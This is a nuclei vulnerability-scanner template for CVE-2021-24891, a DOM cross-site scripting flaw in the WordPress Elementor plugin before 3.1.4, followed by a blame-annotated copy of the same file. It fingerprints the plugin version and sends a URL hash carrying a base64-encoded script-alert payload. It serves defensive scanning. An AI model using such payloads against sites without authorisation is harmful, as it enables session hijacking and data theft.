nuclei-templates/http/cves/2021/CVE-2021-24891.yaml

id: CVE-2021-24891

info:
  name: WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: |
    WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update WordPress Elementor Website Builder to version 3.1.4 or later to mitigate this vulnerability.
  reference:
    - https://www.jbelamor.com/xss-elementor-lightox.html
    - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24891
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24891
    cwe-id: CWE-79
    epss-score: 0.00116
    epss-percentile: 0.45236
    cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: elementor
    product: website_builder
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/elementor/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Elementor Website Builder'

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js"
      - "{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200

      - type: regex
        part: body_1
        regex:
          - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"
        internal: true

      - type: kval
        kval:
          - version
# digest: 490a0046304402205b282380b349f854fb682c0a9e29f9260987ccc282a94ff7317206ba7e3d03db022055093df9a46c6e757eac59c584cb657f373924eae480a7af9c82cf24c168f3a8:922c64590222798bb761d5b6d8e72950
Added CVE-2021-24891 (#4586) 2022-06-14 12:11:47 +00:00			`id: CVE-2021-24891`

			`info:`
Dashboard Content Enhancements (#5242) Dashboard Content Enhancements 2022-08-29 13:55:23 +00:00			`name: WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting`
Added CVE-2021-24891 (#4586) 2022-06-14 12:11:47 +00:00			`author: dhiyaneshDk`
			`severity: medium`
			`description: \|`
Dashboard Content Enhancements (#5242) Dashboard Content Enhancements 2022-08-29 13:55:23 +00:00			`WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Update WordPress Elementor Website Builder to version 3.1.4 or later to mitigate this vulnerability.`
Added CVE-2021-24891 (#4586) 2022-06-14 12:11:47 +00:00			`reference:`
			`- https://www.jbelamor.com/xss-elementor-lightox.html`
			`- https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-24891`
product/queries updated 2024-05-31 19:23:20 +00:00			`- https://github.com/ARPSyndicate/kenzer-templates`
Auto Generated CVE annotations [Tue Jun 14 12:22:20 UTC 2022] :robot: 2022-06-14 12:22:20 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
			`cve-id: CVE-2021-24891`
			`cwe-id: CWE-79`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`epss-score: 0.00116`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-percentile: 0.45236`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:elementor:website_builder::::::wordpress::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
Revert "TemplateMan Update [Mon Apr 8 11:30:07 UTC 2024] :robot:" This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6. 2024-04-08 11:34:33 +00:00			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: elementor`
Revert "TemplateMan Update [Mon Apr 8 11:30:07 UTC 2024] :robot:" This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6. 2024-04-08 11:34:33 +00:00			`product: website_builder`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`framework: wordpress`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss`
added flow 2024-03-26 17:26:22 +00:00			`flow: http(1) && http(2)`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
added flow 2024-03-26 17:26:22 +00:00			`- raw:`
			`- \|`
			`GET /wp-content/plugins/elementor/readme.txt HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: word`
			`internal: true`
			`words:`
			`- 'Elementor Website Builder'`

Added CVE-2021-24891 (#4586) 2022-06-14 12:11:47 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js"`
			`- "{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9"`

CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200`

			`- type: regex`
			`part: body_1`
			`regex:`
			`- "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)\|[0-4]+\\.[0-9]+))\|[0-2]+[0-9.]+)"`

Added CVE-2021-24891 (#4586) 2022-06-14 12:11:47 +00:00			`extractors:`
			`- type: regex`
			`name: version`
			`group: 1`
			`regex:`
			`- "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)\|[0-4]+\\.[0-9]+))\|[0-2]+[0-9.]+)"`
			`internal: true`

			`- type: kval`
			`kval:`
			`- version`
Auto Template Signing [Mon Apr 8 11:29:20 UTC 2024] :robot: 2024-04-08 11:29:20 +00:00			`# digest: 490a0046304402205b282380b349f854fb682c0a9e29f9260987ccc282a94ff7317206ba7e3d03db022055093df9a46c6e757eac59c584cb657f373924eae480a7af9c82cf24c168f3a8:922c64590222798bb761d5b6d8e72950`